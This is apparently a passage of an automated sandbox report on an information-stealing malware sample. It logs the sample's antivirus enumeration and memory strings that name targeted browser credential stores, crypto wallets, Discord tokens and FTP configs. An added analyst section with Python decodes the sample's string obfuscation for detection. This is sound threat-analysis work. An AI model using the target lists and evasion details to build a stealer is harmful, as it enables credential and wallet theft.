Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77162 VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\Notepad.exe VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\Notepad.exe VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77162\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77162\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77162\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77162\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77162\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77162\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77162\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77162\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77162\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77162\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77162\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77162\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77162\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77162\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77162\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77162\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77162\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77162\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77162\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77162\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77162\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77162\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\Notepad.exe VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\Notepad.exe VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\Notepad.exe VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77162\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77162\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77162\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\Notepad.exe VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77162\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77162\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77162\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77162\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\Notepad.exe VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\Notepad.exe VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\Notepad.exe VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77162 VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77162\_wmi.pyd VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77162\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77162\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\Notepad.exe VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\Notepad.exe VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77162\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77162\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77162 VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\Notepad.exe VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\Notepad.exe VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77162 VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\Notepad.exe VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\Notepad.exe VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77162 VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77162\_bz2.pyd VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\Notepad.exe VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77162 VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77162\_lzma.pyd VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\Notepad.exe VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77162 VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\Notepad.exe VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77162\_socket.pyd VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\Notepad.exe VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77162 VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI77162\select.pyd VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\Notepad.exe VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI80002\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI80002\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI80002\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI80002\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI80002\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI80002\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI80002\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI80002\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI80002\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI80002\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI80002\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI80002\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\Notepad.exe VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\Notepad.exe VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI80002\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI80002\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI80002 VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI80002 VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI80002 VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI80002 VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI80002\_ctypes.pyd VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\Notepad.exe VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI80002 VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\Notepad.exe VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\Notepad.exe VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI80002\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI80002\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI80002\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI80002\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI80002\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI80002\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI80002\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI80002\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI80002\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI80002\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI80002\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI80002\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI80002\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI80002\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI80002\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI80002\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI80002\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI80002\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI80002\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI80002\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI80002\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI80002\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI80002\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI80002\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI80002\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\Notepad.exe VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\Notepad.exe VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\Notepad.exe VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI80002\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI80002\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI80002\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\Notepad.exe VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI80002\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI80002\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI80002\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI80002\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\Notepad.exe VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\Notepad.exe VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\Notepad.exe VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\Notepad.exe VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI80002 VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI80002\_wmi.pyd VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\Notepad.exe VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI80002\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI80002\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\Notepad.exe VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\Notepad.exe VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI80002\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI80002\base_library.zip VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI80002 VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\Notepad.exe VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\Notepad.exe VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI80002 VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\Notepad.exe VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\Notepad.exe VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI80002 VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI80002\_bz2.pyd VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\Notepad.exe VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI80002 VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI80002\_lzma.pyd VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\Notepad.exe VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI80002 VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\Notepad.exe VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI80002 VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI80002\_socket.pyd VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\Notepad.exe VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI80002 VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI80002\select.pyd VolumeInformation
Source: C:\Users\user\Notepad.exe Queries volume information: C:\Users\user\Notepad.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Code function: 6_2_00007FF7F04FC590 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 6_2_00007FF7F04FC590
Source: C:\Users\user\AppData\Local\Temp\Notepad.exe Code function: 6_2_00007FF7F0516950 _get_daylight,_get_daylight,_get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation, 6_2_00007FF7F0516950
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Users\user\AppData\Local\Temp\fix.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Users\user\AppData\Local\Temp\fix.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
Source: C:\Users\user\AppData\Local\Temp\fix.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
Source: C:\Users\user\AppData\Local\Temp\fix.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
Source: C:\Users\user\AppData\Local\Temp\fix.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Users\user\AppData\Local\Temp\fix.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct

Stealing of Sensitive Information

Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: 10.0.fix.exe.720000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Setup.exe.313a458.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Setup.exe.313a458.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.0.mergedALL.exe.fe0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000A.00000002.2524237107.0000000002A60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1690804968.0000000003131000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000000.1686994806.0000000000722000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1690804968.00000000030F0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000000.1671099792.0000000000FE2000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Setup.exe PID: 6184, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\mergedALL.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\fix.exe, type: DROPPED
Source: Setup.exe, 00000000.00000002.1690804968.0000000003131000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: [^\u0020-\u007F]ProcessIdname_on_cardencrypted_valuehttps://ipinfo.io/ip%appdata%\logins{0}\FileZilla\recentservers.xml%appdata%\discord\Local Storage\leveldb\tdataAtomicWalletv10/C \EtFile.IOhereuFile.IOm\walFile.IOletsESystem.UItherSystem.UIeumElectrum[AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7}profiles\Windows\valueexpiras21ation_moas21nth
Source: Setup.exe, 00000000.00000002.1690804968.0000000003131000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: user.config{0}\FileZilla\sitemanager.xmlcookies.sqlite\Program Files (x86)\configRoninWalletdisplayNamehost_key\Electrum\walletsName\Exodus\exodus.walletnanjmdknhkinifnkgdcggcfnhdaammmjtdataexpires_utc\Program Data\coMANGOokies.sqMANGOlite*ssfn*ExodusDisplayVersion%localappdata%\GuildWalletOpHandlerenVPHandlerN ConHandlernect%DSK_23%YoroiWalletcmdOpera GXhttps://api.ipify.orgcookies//settinString.Removeg[@name=\PasswString.Removeord\]/valuString.RemoveeSaturnWalletWeb DataSteamPathwaasflleasft.datasfCommandLineSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallCookiesis_secureSoftware\Valve\SteamLogin DataID: isSecureNoDefrdDefVPNDefwaasflletasfMewCxv11\Program Files\Opera GX StableSELECT * FROM Win32_Process Where SessionId='nlbmnnijcnlegkjjpcfjclmcfggfefdmnkddgncdjgjfcddamfgcmfnlhccnimig\coFile.IOm.libeFile.IOrty.jFile.IOaxFile.IOxnamefnjhmkhhmkbjkkabndcnnogagogbneecfhilaheimglignddkjgofkcbgekhenbhProfile_Unknowncard_number_encrypted, Name: AppData\Roaming\TReplaceokReplaceenReplaces.tReplacext //settString.Replaceing[@name=\UString.Replacesername\]/vaString.ReplacelueNWinordVWinpn.eWinxe*Winhostmoz_cookiesUser Datawindows-1251, CommandLine: \ExodusDisplayNameexpiry*.vstring.ReplacedfJaxxpathBSJB
Source: powershell.exe, 00000001.00000002.1844537369.0000000007BF0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: sqlcolumnencryptionkeystoreprovider
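The strings dumped from Setup.exe above are not garbage: each literal has a filler token spliced into it ("coMANGOokies.sqMANGOlite", "TReplaceokReplaceenReplaces.tReplacext", "\coFile.IOm.libeFile.IOrty.jFile.IOaxFile.IOx") and is repaired at runtime by removing that token, which is why the cleartext wallet and browser paths never appear in the binary on disk and why the detections here come from Yara on memory rather than from file strings. The Python below is an added example, not code from the report or from the sample. The filler tokens ("MANGO", "asf", "Replace", "Handler", "Win", "as21", "File.IO", "String.Remove", "String") are inferred from the strings shown above; the guessing heuristic assumes one filler token per literal and is an assumption of this example, not a documented property of the malware. It is fooled where the cleartext itself repeats a substring (after "File.IO" is stripped from the Ethereum literal, the remaining "\Ethereum\walletsEthereum" repeats "Ethereum"), so on a real sample the safest source of the token is the string-replacement call beside each literal in the decompiled assembly.

```python
import re

# Obfuscated literals copied from the Setup.exe memory-dump strings in the
# report, paired with the cleartext expected after removing the filler token.
# The tokens are inferred from these strings, not taken from RedLine's code.
REPORT_SAMPLES = {
    "coMANGOokies.sqMANGOlite": "cookies.sqlite",
    "waasflleasft.datasf": "wallet.dat",
    "TReplaceokReplaceenReplaces.tReplacext": "Tokens.txt",
    "OpHandlerenVPHandlerN ConHandlernect": "OpenVPN Connect",
    "NWinordVWinpn.eWinxe*Win": "NordVpn.exe*",
    "expiras21ation_moas21nth": "expiration_month",
    r"\coFile.IOm.libeFile.IOrty.jFile.IOaxFile.IOx": r"\com.liberty.jaxx",
    r"settinString.Removeg[@name=\PasswString.Removeord\]/valuString.Removee":
        r"setting[@name=\Password\]/value",
    r"[AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7}":
        r"[A-Za-z\d]{24}\.[\w-]{6}\.[\w-]{27}",
}


def repeated_substrings(s, min_len=3, min_count=2):
    """Map every substring of s that is at least min_len long and occurs at
    least min_count times (counted non-overlapping) to its occurrence count."""
    found = {}
    n = len(s)
    for length in range(min_len, n // min_count + 1):
        seen = set()
        for i in range(n - length + 1):
            tok = s[i:i + length]
            if tok in seen:
                continue
            seen.add(tok)
            cnt = s.count(tok)
            if cnt >= min_count:
                found[tok] = cnt
    return found


def guess_junk_token(s):
    """Heuristic (an assumption of this example): the filler token is the
    repeated substring whose removal strips the most characters; ties go to
    the longer token. Returns None when nothing repeats."""
    found = repeated_substrings(s)
    if not found:
        return None
    return max(found, key=lambda t: (found[t] * len(t), len(t)))


def deobfuscate(s, token=None):
    """Undo the junk insertion by deleting the filler token, which is what the
    sample's own string repair does at runtime (assumed from the dump)."""
    token = token or guess_junk_token(s)
    return s.replace(token, "") if token else s


def decode_samples():
    """Decode every literal in REPORT_SAMPLES with a guessed token."""
    return {obf: deobfuscate(obf) for obf in REPORT_SAMPLES}


# The decoded regex is the 24.6.27 shape of a Discord user token, consistent
# with the "discord\Local Storage\leveldb" path in the same dump.
DISCORD_TOKEN_RE = re.compile(deobfuscate(
    r"[AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7}"))


def looks_like_discord_token(candidate):
    return DISCORD_TOKEN_RE.fullmatch(candidate) is not None


if __name__ == "__main__":
    for obf, clear in decode_samples().items():
        status = "ok" if clear == REPORT_SAMPLES[obf] else "MISMATCH"
        print(f"{status:8} {obf!r} -> {clear!r}")
```

The decoded values ("Tokens.txt", "NordVpn.exe*", "OpenVPN Connect", "setting[@name=\Password\]/value", the Discord token regex) are the strings worth hunting for in other dumps of this family; a file-based rule on the cleartext would miss the on-disk sample, so a rule needs either the memory image or the tokenised forms.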
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\fix.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\fix.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\fix.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies
Source: C:\Users\user\AppData\Local\Temp\fix.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe File opened: C:\Users\user\AppData\Roaming\atomic\
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe File opened: C:\Users\user\AppData\Roaming\Binance\
Source: C:\Users\user\AppData\Local\Temp\mergedALL.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\Cache\
